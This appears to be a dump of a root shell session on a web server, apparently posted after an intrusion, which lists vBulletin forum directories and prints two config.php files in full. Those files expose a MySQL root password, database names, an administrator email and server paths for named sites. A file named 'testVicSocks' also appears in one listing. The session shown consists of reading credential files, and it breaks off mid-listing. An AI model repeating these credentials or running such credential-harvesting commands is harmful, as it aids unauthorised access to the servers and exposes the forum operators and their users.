-rw-r--r-- 1 root root 75242 Apr 5 2010 calendar.php -rw-r--r-- 1 root root 58135 Apr 5 2010 checksums.md5 -rw-r--r-- 1 root root 43 Apr 5 2010 clear.gif drwxr-xr-x 4 root root 4096 Apr 5 2010 clientscript -rw-r--r-- 1 root root 15277 Apr 5 2010 converse.php drwxr-xr-x 7 root root 4096 Apr 5 2010 cpstyles -rw-r--r-- 1 root root 3233 Apr 5 2010 cron.php drwxr-xr-x 3 root root 4096 Apr 5 2010 customavatars drwxr-xr-x 3 root root 4096 Apr 5 2010 customgroupicons drwxr-xr-x 2 root root 4096 Apr 5 2010 customprofilepics -rw-r--r-- 1 root root 3485 Apr 5 2010 dgt_released.nfo -rw-r--r-- 1 root root 47671 Apr 5 2010 editpost.php -rw-r--r-- 1 root root 29410 Apr 5 2010 external.php -rw-r--r-- 1 root root 9702 Apr 5 2010 faq.php -rw-r--r-- 1 root root 10134 Apr 5 2010 favicon.ico -rw-r--r-- 1 root root 521 Apr 5 2010 file_id.diz -rw-r--r-- 1 root root 35900 Apr 5 2010 forumdisplay.php -rw-r--r-- 1 root root 39747 Apr 5 2010 global.php -rw-r--r-- 1 root root 138104 Apr 5 2010 group.php -rw-r--r-- 1 root root 24835 Apr 5 2010 group_inlinemod.php -rw-r--r-- 1 root root 10747 Apr 5 2010 groupsubscription.php -rw-r--r-- 1 root root 8963 Apr 5 2010 image.php drwxr-xr-x 16 root root 4096 Apr 5 2010 images drwxr-xr-x 6 root root 12288 May 22 2010 includes -rw-r--r-- 1 root root 19508 Apr 5 2010 index.php -rw-r--r-- 1 root root 43844 Apr 5 2010 infraction.php -rw-r--r-- 1 root root 182837 Apr 5 2010 inlinemod.php drwxr-xr-x 2 root root 4096 May 22 2010 install -rw-r--r-- 1 root root 10258 Apr 5 2010 joinrequests.php -rw-r--r-- 1 root root 10138 Apr 5 2010 login.php -rw-r--r-- 1 root root 16980 Apr 5 2010 member.php -rw-r--r-- 1 root root 15847 Apr 5 2010 member_inlinemod.php -rw-r--r-- 1 root root 35817 Apr 5 2010 memberlist.php -rw-r--r-- 1 root root 23782 Apr 5 2010 misc.php drwxr-xr-x 2 root root 4096 Apr 5 2010 modcp -rw-r--r-- 1 root root 63240 Apr 5 2010 moderation.php -rw-r--r-- 1 root root 6672 Apr 5 2010 moderator.php -rw-r--r-- 1 root root 18392 Apr 5 2010 newattachment.php -rw-r--r-- 1 root root 37017 Apr 5 2010 newreply.php -rw-r--r-- 1 root root 18827 Apr 5 2010 newthread.php -rw-r--r-- 1 root root 19520 Apr 5 2010 online.php -rw-r--r-- 1 root root 7612 Apr 5 2010 payment_gateway.php -rw-r--r-- 1 root root 11826 Apr 5 2010 payments.php -rw-r--r-- 1 root root 7805 Apr 5 2010 picture.php -rw-r--r-- 1 root root 21956 Apr 5 2010 picture_inlinemod.php -rw-r--r-- 1 root root 25223 Apr 5 2010 picturecomment.php -rw-r--r-- 1 root root 27328 Apr 5 2010 poll.php -rw-r--r-- 1 root root 9428 Apr 5 2010 posthistory.php -rw-r--r-- 1 root root 74284 Apr 5 2010 postings.php -rw-r--r-- 1 root root 6509 Apr 5 2010 printthread.php -rw-r--r-- 1 root root 70656 Apr 5 2010 private.php -rw-r--r-- 1 root root 152244 Apr 5 2010 profile.php -rw-r--r-- 1 root root 39667 Apr 5 2010 register.php -rw-r--r-- 1 root root 5603 Apr 5 2010 report.php -rw-r--r-- 1 root root 13635 Apr 5 2010 reputation.php -rw-r--r-- 1 root root 124633 Apr 5 2010 search.php -rw-r--r-- 1 root root 20862 Apr 5 2010 sendmessage.php -rw-r--r-- 1 root root 9925 Apr 5 2010 showgroups.php -rw-r--r-- 1 root root 12304 Apr 5 2010 showpost.php -rw-r--r-- 1 root root 75611 Apr 5 2010 showthread.php drwxr-xr-x 2 root root 4096 Apr 5 2010 signaturepics -rw-r--r-- 1 root root 32792 Apr 5 2010 subscription.php -rw-r--r-- 1 root root 13281 Apr 5 2010 tags.php -rw-r--r-- 1 root root 8608 Apr 5 2010 threadrate.php -rw-r--r-- 1 root root 12331 Apr 5 2010 threadtag.php drwxr-xr-x 2 root root 4096 May 22 2010 upload -rw-r--r-- 1 root root 34424 Apr 5 2010 usercp.php -rw-r--r-- 1 root root 19011 Apr 5 2010 usernote.php -rw-r--r-- 1 root root 29490 Apr 5 2010 validator.php -rw-r--r-- 1 root root 3417514 May 22 2010 vb38.rar -rw-r--r-- 1 root root 27293 Apr 5 2010 visitormessage.php drwxr-xr-x 2 root root 4096 May 22 2010 web # cat includes/config.php <?php /*======================================================================*\ || #################################################################### || || # vBulletin 3.8.5 || # ---------------------------------------------------------------- # || || # All PHP code in this file is ?2000-2010 Jelsoft Enterprises Ltd. # || || # This file may not be redistributed in whole or significant part. # || || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || || #################################################################### || \*======================================================================*/ /*-------------------------------------------------------*\ | ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* | +---------------------------------------------------------+ | Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten- | | bank Fehler auftreten, muessen Sie Ihren Provider um | | Hilfe bitten, da wir Ihnen die richtigen Daten fuer die | | Variablen in dieser Datei nicht nennen koennen. | \*-------------------------------------------------------*/ // ****** DATENBANK: TYP ****** // Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank // befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli. // Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden. // Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein. $config['Database']['dbtype'] = 'mysql'; // ****** DATENBANK: NAME DER DATENBANK ****** // Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll. // Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider. $config['Database']['dbname'] = 'cccteam'; // ****** TABELLEN-PRAEFIX ****** // Praefix, das den Tabellennamen in der Datenbank vorangestellt wird. // Zum Beispiel: $config['Database']['tableprefix'] = 'vb3_'; // Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei // install/tableprefix.php hinzufuegen, aendern oder entfernen. $config['Database']['tableprefix'] = ''; // ****** TECHNISCHE E-MAIL-ADRESSE ****** // Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung // an diese Adresse geschickt. // Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine // E-Mails verschickt. $config['Database']['technicalemail'] = 'dbmeister@beispiel.xy'; // ****** LEEREN SQL-MODUS ERZWINGEN ****** // In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin // kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen // deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert. $config['Database']['force_sql_mode'] = false; // ****** MASTER-DATENBANK: SERVERNAME UND PORT ****** // Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein. // Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst // mit dem Standardwerten. $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['port'] = 3306; // ****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ****** // Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff // auf den MySQL-Server benoetigen. // Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider. $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = 'QkZorIZZC5e'; // ****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ****** // Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen. // Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht // bei extrem grossen Foren. // Wenn Sie nicht sicher sind, was Sie hier angeben sollen, lassen Sie die Einstellung // auf aus. // 0 = aus; 1 = an $config['MasterServer']['usepconnect'] = 0; // ****** SLAVE-DATENBANK: KONFIGURATION ****** // Wenn Sie zwei Datenbankserver verwenden, koennen Sie hier die Daten fuer den Slave-Server // festlegen. // Wenn Sie sich nicht 100% sicher sind, ob Sie hier etwas eintragen muessen, veraendern Sie die // Standardeinstellungen nicht. $config['SlaveServer']['servername'] = ''; $config['SlaveServer']['port'] = 3306; $config['SlaveServer']['username'] = ''; $config['SlaveServer']['password'] = ''; $config['SlaveServer']['usepconnect'] = 0; // ****** PFADE ZUM ADMINISTRATOR- UND MODERATOR-KONTROLLZENTRUM ****** // Hier koennen Sie fuer die Verzeichnisse, in denen sich die Dateien fuer das // Administrator- und Moderator-Kontrollzentrum befinden, alternative Namen an- // geben. Vielleicht moechten Sie dies aus Sicherheitsgruenden tun. // Bitte beachten Sie, dass, wenn Sie die Namen hier aendern, Sie auch noch die // Namen der Verzeichnisse auf dem Server aendern muessen. $config['Misc']['admincpdir'] = 'admincp'; $config['Misc']['modcpdir'] = 'modcp'; // ****** COOKIE-PRAEFIX ****** // Praefix, das in allen vBulletin-Cookies enthalten ist. // Halten Sie es kurz und verwenden Sie nur Zahlen und Buchstaben, d.h. 1-9 und a-Z $config['Misc']['cookieprefix'] = 'bb'; // ****** VOLLSTAENDIGER PFAD ZUM VERZEICHNIS DES FORUMS ****** // Bei einigen Servern kann es noetig sein, den vollstaendigen Pfad zum Verzeichnis des Forums // anzugeben, damit vBulletin ohne Probleme funktioniert. Sie muessen diese Einstellung nur // aendern, wenn vBulletin Sie dazu auffordert. // Hinweis: Verwenden Sie keinen abschliessenden Schraegstrich ('/') nach dem Verzeichnisnamen. // Beispiel fuer Unix: // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; // Beispiel fuer Win32: // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; $config['Misc']['forumpath'] = ''; // ****** COOKIE SICHERHEITS HASH ****** // Diese Option erlaubt die Cookies zu verschluesseln. // Benutzbar sind dabei jegliche Zahlen und Buchstaben, d.h. 1-9 und a-Z. // Diese Angabe kann leer gelassen werden um den Standard zu benutzen. // Hinweis: Bei Aenderung werden alle Benutzer ausgeloggt. $config['Misc']['cookie_security_hash'] = ''; // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG SEHEN DUERFEN ****** // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum das // Kontrollzentrum-Log ansehen. // Die Benutzer werden hier durch ihre User-ID angegeben. Um die User-ID heraus- // zufinden, sehen Sie sich den Benutzer im Administrator-Kontrollzentrum an. // Falls Sie diese Datei fuer eine Neuinstallation aendern, lassen Sie den Standard- // wert stehen, da der erste Benutzer (Administrator) die User-ID 1 erhaelt. // Trennen Sie mehrere User-IDs mit einem Komma voneinander. // Beispiel 1: $config['SpecialUsers']['canviewadminlog'] = '1'; // Beispiel 2: $config['SpecialUsers']['canviewadminlog'] = '1,5,9'; $config['SpecialUsers']['canviewadminlog'] = '1'; // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG LOESCHEN DUERFEN ****** // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum // Eintraege aus dem Kontrollzentrum-Log loeschen. // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). $config['SpecialUsers']['canpruneadminlog'] = '1'; // ****** BENUTZER, DIE QUERYS AUSFUEHREN DUERFEN ****** // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum // Querys (Datenbankabfragen) ausfuehren. // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). // Hinweis: Querys ausfuehren zu koennen, kann eine kritische Angelegenheit sein. // Aus Sicherheitsgruenden sollten Sie in diese Liste keine User-IDs eintragen. $config['SpecialUsers']['canrunqueries'] = ''; // ****** UNLOESCHBARE / UNVERAENDERBARE BENUTZER ****** // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum // von anderen Benutzern nicht geloescht oder bearbeitet werden. // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). $config['SpecialUsers']['undeletableusers'] = ''; // ****** SUPER-ADMINISTRATOREN ****** // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum die // Seite fuer die Administrator-Berechtigungen aufrufen und damit die Rechte // anderer Administratoren bearbeiten. // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). $config['SpecialUsers']['superadministrators'] = '1'; // ****** DATASTORE-CACHE KONFIGURATION ****** // Hier koennen Sie die verschiedenen Methoden konfigurieren, die fuer den Cache // der Datastore-Elemente verwendet werden. // vB_Datastore_Filecache - um die Cache-Datei /includes/datastore/datastore_cache.php zu verwenden (CHMOD 777 benoetigt) // vB_Datastore_APC - um APC zu verwenden // vB_Datastore_XCache - um XCache zu verwenden // vB_Datastore_eAccelerator - um eAccelerator zu verwenden // vB_Datastore_Memcached - um einen Memcache-Server zu verwenden (Konfiguration weiter unten) // $config['Datastore']['class'] = 'vB_Datastore_Filecache'; // ****** DATASTORE-PRAEFIX ****** // Wenn Sie einen PHP-Cache (APC, XCache, eAccelerator) verwenden und auf Ihrem // Server mehr als ein Forum installiert ist, *kann* es sein, dass Sie hier // ein Datastore-Praefix angeben muessen, damit die Foren nicht dieselbe // Variable im Cache verwenden. // Dies funktioniert aehnlich wie das Tabellen-Praefix fuer die Datenbank. // $config['Datastore']['prefix'] = ''; // Bei einem Memcache-Server ist es auch notwendig, dass Sie den Hostnamen bzw. // die IP-Adresse und den Port angeben, unter denen der Server erreichbar ist: /* $config['Datastore']['class'] = 'vB_Datastore_Memcached'; $i = 0; // Erster Server $i++; $config['Misc']['memcacheserver'][$i] = '127.0.0.1'; $config['Misc']['memcacheport'][$i] = 11211; $config['Misc']['memcachepersistent'][$i] = true; $config['Misc']['memcacheweight'][$i] = 1; $config['Misc']['memcachetimeout'][$i] = 1; $config['Misc']['memcacheretry_interval'][$i] = 15; */ // ******************************************************************************** // ****** Die folgenden Einstellungen werden nur in Spezialfaellen benoetigt ****** // ******************************************************************************** // ****** MySQLI-EINSTELLUNGEN ****** // Wenn Sie MySQL 4.1+ verwenden, sollte MySQLi fuer die Verbindung zur Datenbank // verwendet werden. // Wenn Ihre Datenbank einen anderen Zeichensatz als 'latin1' verwendet, koennen Sie // hier den Standard-Zeichensatz fuer die Verbindung angeben. // Wenn Sie nicht denselben Zeichensatz angeben, den Ihre Datenbank verwendet, kann // es zu Fehlermeldungen dieser Art kommen: // 'mysql error: Illegal mix of collations' // Sie muessen diese Einstellung nur aendern, wenn Sie sicher wissen, dass dies noetig ist. // $config['Mysqli']['charset'] = 'utf8'; // Zusaetzlich kann PHP angewiesen werden, die Verbindungs-Parameter aus der Datei // auszulesen, die in 'ini_file' angegeben wurde. Bitte geben Sie den vollstaendigen // Pfad zu dieser Datei an. // Beispiel: // $config['Mysqli']['ini_file'] = 'C:\Programme\MySQL\MySQL Server 4.1\my.ini'; $config['Mysqli']['ini_file'] = ''; // Einstellungen fuer die Grafikverarbeitung // Alle Grafiken, die groesser als die unten angegebenen Dimensionen sind, werden von // vBulletin nicht verkleinert. Wenn auch groessere Grafiken verkleinert werden sollen, // passen Sie diese Einstellungen an. $config['Misc']['maxwidth'] = 2592; $config['Misc']['maxheight'] = 1944; // GZIP komplett deaktivieren: Dies ist noetig, wenn auf dem Server standardmaessig // GZIP aktiv ist und diese Option auch im Administrator-Kontrollzentrum aktiviert wurde. // Dadurch ist oft in vBulletin keine Anmeldung mehr moeglich. // Moeglicherweise ist es noetig, die folgende Zeile in der Datei /includes/init.php oder // /includes/class_core.php aufzunehmen, damit dieser Eintrag wirksam wird. //define('NOZIP', 1); // Plug-in-System komplett deaktivieren: Dies ist noetig, wenn durch // fehlerhafte Plug-ins in vBulletin keine Anmeldung mehr moeglich ist. //define('DISABLE_HOOKS', 1); // Keine E-Mails verschicken. Diese Einstellung sollte fuer ein Test-Forum aktiviert werden. //define('DISABLE_MAIL', true); // Debug-Modus aktivieren: Nur fuer Entwickler gedacht. //if (VB_AREA == 'AdminCP') //{ // $config['Misc']['debug'] = 1; //} /*======================================================================*\ || #################################################################### || # CVS: $RCSfile$ - $Revision: 1035 $ 28757 || #################################################################### \*======================================================================*/ // Ja, es ist richtig, dass am Ende dieser Datei kein schliessendes PHP-Tag steht! // Dadurch wird ein haeufig auftretender Fehler vermieden. # cd /var/www/scenecms.org/ && ls -la total 32 drwxrwxrwx 4 root root 4096 Oct 1 09:18 . drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. drwxr-xr-x 3 root root 4096 Oct 1 09:18 ba -rw-r--r-- 1 root root 35 Mar 15 2010 index.php -rw-r--r-- 1 root root 9962 May 10 2010 oldDATA.tgz drwxrwxrwx 3 root root 4096 Jul 8 2010 web # cd web && ls -la total 12 drwxrwxrwx 3 root root 4096 Jul 8 2010 . drwxrwxrwx 4 root root 4096 Oct 1 09:18 .. drwxr-xr-x 16 root root 4096 Oct 2 15:14 board # cd board/ && ls -la total 2272 drwxr-xr-x 16 root root 4096 Oct 2 15:14 . drwxrwxrwx 3 root root 4096 Jul 8 2010 .. -rw-r--r-- 1 root root 17097 Apr 23 2010 LICENSE drwxr-xr-x 3 root root 4096 Oct 2 15:31 admincp -rw-r--r-- 1 root root 38048 Apr 23 2010 ajax.php -rw-r--r-- 1 root root 75538 Apr 23 2010 album.php -rw-r--r-- 1 root root 19054 Apr 23 2010 announcement.php drwxr-xr-x 2 root root 4096 Jul 8 2010 archive -rw-r--r-- 1 root root 8945 Apr 23 2010 asset.php -rw-r--r-- 1 root root 20246 Apr 23 2010 assetmanage.php -rw-r--r-- 1 root root 15723 Apr 23 2010 attachment.php -rw-r--r-- 1 root root 6119 Apr 23 2010 attachment_inlinemod.php -rw-r--r-- 1 root root 3462 Apr 23 2010 blog_attachment.php -rw-r--r-- 1 root root 96014 Apr 23 2010 calendar.php -rw-r--r-- 1 root root 43 Apr 23 2010 clear.gif drwxr-xr-x 7 root root 4096 Jul 8 2010 clientscript -rw-r--r-- 1 root root 15283 Apr 23 2010 converse.php drwxr-xr-x 7 root root 4096 Jul 8 2010 cpstyles -rw-r--r-- 1 root root 3244 Apr 23 2010 cron.php -rw-r--r-- 1 root root 4051 Apr 23 2010 css.php drwxr-xr-x 3 root root 4096 Jul 8 2010 customavatars drwxr-xr-x 3 root root 4096 Jul 8 2010 customgroupicons drwxr-xr-x 2 root root 4096 Jul 8 2010 customprofilepics -rw-r--r-- 1 root root 1660 Apr 23 2010 editor.php -rw-r--r-- 1 root root 46327 Apr 23 2010 editpost.php -rw-r--r-- 1 root root 1336 Apr 23 2010 entry.php -rw-r--r-- 1 root root 29278 Apr 23 2010 external.php -rw-r--r-- 1 root root 9901 Apr 23 2010 faq.php -rw-r--r-- 1 root root 10134 Apr 23 2010 favicon.ico -rw-r--r-- 1 root root 22502 Apr 23 2010 forum.php -rw-r--r-- 1 root root 42428 Apr 23 2010 forumdisplay.php -rw-r--r-- 1 root root 2001 Apr 23 2010 global.php -rw-r--r-- 1 root root 155709 Apr 23 2010 group.php -rw-r--r-- 1 root root 26085 Apr 23 2010 group_inlinemod.php -rw-r--r-- 1 root root 11483 Apr 23 2010 groupsubscription.php -rw-r--r-- 1 root root 8974 Apr 23 2010 image.php drwxr-xr-x 24 root root 4096 Oct 2 16:42 images drwxr-xr-x 8 root root 12288 Oct 2 15:27 includes -rw-r--r-- 1 root root 2335 Apr 23 2010 index.php -rw-r--r-- 1 root root 46944 Apr 23 2010 infraction.php -rw-r--r-- 1 root root 186868 Apr 23 2010 inlinemod.php drwxr-xr-x 3 root root 4096 Oct 2 15:09 install -rw-r--r-- 1 root root 11280 Apr 23 2010 joinrequests.php -rw-r--r-- 1 root root 1656 Apr 23 2010 list.php -rw-r--r-- 1 root root 10749 Apr 23 2010 login.php -rw-r--r-- 1 root root 18893 Apr 23 2010 member.php -rw-r--r-- 1 root root 16327 Apr 23 2010 member_inlinemod.php -rw-r--r-- 1 root root 40280 Apr 23 2010 memberlist.php -rw-r--r-- 1 root root 22247 Apr 23 2010 misc.php drwxr-xr-x 2 root root 4096 Jul 8 2010 modcp -rw-r--r-- 1 root root 75687 Apr 23 2010 moderation.php -rw-r--r-- 1 root root 6714 Apr 23 2010 moderator.php -rw-r--r-- 1 root root 17286 Apr 23 2010 newattachment.php -rw-r--r-- 1 root root 38921 Apr 23 2010 newreply.php -rw-r--r-- 1 root root 19610 Apr 23 2010 newthread.php -rw-r--r-- 1 root root 21719 Apr 23 2010 online.php drwxr-xr-x 5 root root 4096 Jul 8 2010 packages -rw-r--r-- 1 root root 8031 Apr 23 2010 payment_gateway.php -rw-r--r-- 1 root root 13196 Apr 23 2010 payments.php -rw-r--r-- 1 root root 3997 Apr 23 2010 picture.php -rw-r--r-- 1 root root 16600 Apr 23 2010 picture_inlinemod.php -rw-r--r-- 1 root root 26104 Apr 23 2010 picturecomment.php -rw-r--r-- 1 root root 29273 Apr 23 2010 poll.php -rw-r--r-- 1 root root 10349 Apr 23 2010 posthistory.php -rw-r--r-- 1 root root 76416 Apr 23 2010 postings.php -rw-r--r-- 1 root root 7022 Apr 23 2010 printthread.php -rw-r--r-- 1 root root 78993 Apr 23 2010 private.php -rw-r--r-- 1 root root 160820 Apr 23 2010 profile.php -rw-r--r-- 1 root root 296 Apr 23 2010 receiver.php -rw-r--r-- 1 root root 54170 Apr 23 2010 register.php -rw-r--r-- 1 root root 5742 Apr 23 2010 report.php -rw-r--r-- 1 root root 14700 Apr 23 2010 reputation.php -rw-r--r-- 1 root root 34065 Apr 23 2010 search.php -rw-r--r-- 1 root root 22645 Apr 23 2010 sendmessage.php -rw-r--r-- 1 root root 12420 Apr 23 2010 showgroups.php -rw-r--r-- 1 root root 12673 Apr 23 2010 showpost.php -rw-r--r-- 1 root root 79415 Apr 23 2010 showthread.php drwxr-xr-x 2 root root 4096 Jul 8 2010 signaturepics -rw-r--r-- 1 root root 37650 Apr 23 2010 subscription.php -rw-r--r-- 1 root root 5334 Apr 23 2010 tags.php -rw-r--r-- 1 root root 8735 Apr 23 2010 threadrate.php -rw-r--r-- 1 root root 11081 Apr 23 2010 threadtag.php -rw-r--r-- 1 root root 61 Apr 23 2010 uploadprogress.gif -rw-r--r-- 1 root root 39049 Apr 23 2010 usercp.php -rw-r--r-- 1 root root 20969 Apr 23 2010 usernote.php drwxr-xr-x 12 root root 4096 Jul 8 2010 vb -rw-r--r-- 1 root root 27814 Apr 23 2010 visitormessage.php -rw-r--r-- 1 root root 1660 Apr 23 2010 widget.php -rw-r--r-- 1 root root 3656 Apr 23 2010 xmlsitemap.php # cat includes/config.php <?php /*======================================================================*\ || #################################################################### || || # vBulletin 4.0.3 Patch Level 1 || # ---------------------------------------------------------------- # || || # All PHP code in this file is ?2000-2010 vBulletin Solutions Inc. # || || # This file may not be redistributed in whole or significant part. # || || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || || #################################################################### || \*======================================================================*/ /*-------------------------------------------------------*\ | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** | +---------------------------------------------------------+ | If you get any errors while attempting to connect to | | MySQL, you will need to email your webhost because we | | cannot tell you the correct values for the variables | | in this file. | \*-------------------------------------------------------*/ // ****** DATABASE TYPE ****** // This is the type of the database server on which your vBulletin database will be located. // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+ // for slave options just append _slave to your preferred database type. $config['Database']['dbtype'] = 'mysql'; // ****** DATABASE NAME ****** // This is the name of the database where your vBulletin will be located. // This must be created by your webhost. $config['Database']['dbname'] = 'forum'; // ****** TABLE PREFIX ****** // Prefix that your vBulletin tables have in the database. $config['Database']['tableprefix'] = ''; // ****** TECHNICAL EMAIL ADDRESS ****** // If any database errors occur, they will be emailed to the address specified here. // Leave this blank to not send any emails when there is a database error. $config['Database']['technicalemail'] = 'admin@scenecms.org'; // ****** FORCE EMPTY SQL MODE ****** // New versions of MySQL (4.1+) have introduced some behaviors that are // incompatible with vBulletin. Setting this value to "true" disables those // behaviors. You only need to modify this value if vBulletin recommends it. $config['Database']['force_sql_mode'] = false; // ****** MASTER DATABASE SERVER NAME AND PORT ****** // This is the hostname or IP address and port of the database server. // If you are unsure of what to put here, leave the default values. $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['port'] = 3306; // ****** MASTER DATABASE USERNAME & PASSWORD ****** // This is the username and password you use to access MySQL. // These must be obtained through your webhost. $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = 'QkZorIZZC5e'; // ****** MASTER DATABASE PERSISTENT CONNECTIONS ****** // This option allows you to turn persistent connections to MySQL on or off. // The difference in performance is negligible for all but the largest boards. // If you are unsure what this should be, leave it off. (0 = off; 1 = on) $config['MasterServer']['usepconnect'] = 0; // ****** SLAVE DATABASE CONFIGURATION ****** // If you have multiple database backends, this is the information for your slave // server. If you are not 100% sure you need to fill in this information, // do not change any of the values here. $config['SlaveServer']['servername'] = ''; $config['SlaveServer']['port'] = 3306; $config['SlaveServer']['username'] = ''; $config['SlaveServer']['password'] = ''; $config['SlaveServer']['usepconnect'] = 0; // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ****** // This setting allows you to change the name of the folders that the admin and // moderator control panels reside in. You may wish to do this for security purposes. // Please note that if you change the name of the directory here, you will still need // to manually change the name of the directory on the server. $config['Misc']['admincpdir'] = 'admincp'; $config['Misc']['modcpdir'] = 'modcp'; // Prefix that all vBulletin cookies will have // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z $config['Misc']['cookieprefix'] = 'bb'; // ******** FULL PATH TO FORUMS DIRECTORY ****** // On a few systems it may be necessary to input the full path to your forums directory // for vBulletin to function normally. You can ignore this setting unless vBulletin // tells you to fill this in. Do not include a trailing slash! // Example Unix: // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; // Example Win32: // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; $config['Misc']['forumpath'] = '/var/www/scenecms.org/web/board'; // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ****** // The users specified here will be allowed to view the admin log in the control panel. // Users must be specified by *ID number* here. To obtain a user's ID number, // view their profile via the control panel. If this is a new installation, leave // the first user created will have a user ID of 1. Seperate each userid with a comma. $config['SpecialUsers']['canviewadminlog'] = '1'; // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ****** // The users specified here will be allowed to remove ("prune") entries from the admin // log. See the above entry for more information on the format. $config['SpecialUsers']['canpruneadminlog'] = '1'; // ****** USERS WITH QUERY RUNNING PERMISSIONS ****** // The users specified here will be allowed to run queries from the control panel. // See the above entries for more information on the format. // Please note that the ability to run queries is quite powerful. You may wish // to remove all user IDs from this list for security reasons. $config['SpecialUsers']['canrunqueries'] = ''; // ****** UNDELETABLE / UNALTERABLE USERS ****** // The users specified here will not be deletable or alterable from the control panel by any users. // To specify more than one user, separate userids with commas. $config['SpecialUsers']['undeletableusers'] = ''; // ****** SUPER ADMINISTRATORS ****** // The users specified below will have permission to access the administrator permissions // page, which controls the permissions of other administrators $config['SpecialUsers']['superadministrators'] = '1'; // ****** DATASTORE CACHE CONFIGURATION ***** // Here you can configure different methods for caching datastore items. // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php // vB_Datastore_APC - to use APC // vB_Datastore_XCache - to use XCache // vB_Datastore_Memcached - to use a Memcache server, more configuration below // $config['Datastore']['class'] = 'vB_Datastore_Filecache'; // ******** DATASTORE PREFIX ****** // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more // than one set of forums installed on your host, you *may* need to use a prefix // so that they do not try to use the same variable within the cache. // This works in a similar manner to the database table prefix. // $config['Datastore']['prefix'] = ''; // It is also necessary to specify the hostname or IP address and the port the server is listening on /* $config['Datastore']['class'] = 'vB_Datastore_Memcached'; $i = 0; // First Server $i++; $config['Misc']['memcacheserver'][$i] = '127.0.0.1'; $config['Misc']['memcacheport'][$i] = 11211; $config['Misc']['memcachepersistent'][$i] = true; $config['Misc']['memcacheweight'][$i] = 1; $config['Misc']['memcachetimeout'][$i] = 1; $config['Misc']['memcacheretry_interval'][$i] = 15; */ // ****** The following options are only needed in special cases ****** // ****** MySQLI OPTIONS ***** // When using MySQL 4.1+, MySQLi should be used to connect to the database. // If you need to set the default connection charset because your database // is using a charset other than latin1, you can set the charset here. // If you don't set the charset to be the same as your database, you // may receive collation errors. Ignore this setting unless you // are sure you need to use it. // $config['Mysqli']['charset'] = 'utf8'; // Optionally, PHP can be instructed to set connection parameters by reading from the // file named in 'ini_file'. Please use a full path to the file. // Example: // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini'; $config['Mysqli']['ini_file'] = ''; // Image Processing Options // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings. $config['Misc']['maxwidth'] = 2592; $config['Misc']['maxheight'] = 1944; /*======================================================================*\ || #################################################################### || # || # CVS: $RCSfile$ - $Revision: 32878 $ || #################################################################### \*======================================================================*/ # cd /var/www/vpn24.org/ && ls -la total 120 drwxr-xr-x 3 root root 4096 Dec 13 22:18 . drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. -rw-r--r-- 1 root root 35 May 9 2010 index.php -rwxr-xr-x 1 root root 18378 Nov 8 19:00 testVicSocks drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 web # cd web # ls -la | grep -v cookie.txt total 3296 drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 . drwxr-xr-x 3 root root 4096 Dec 13 22:18 .. -rw-r--r-- 1 www-data www-data 6413 Dec 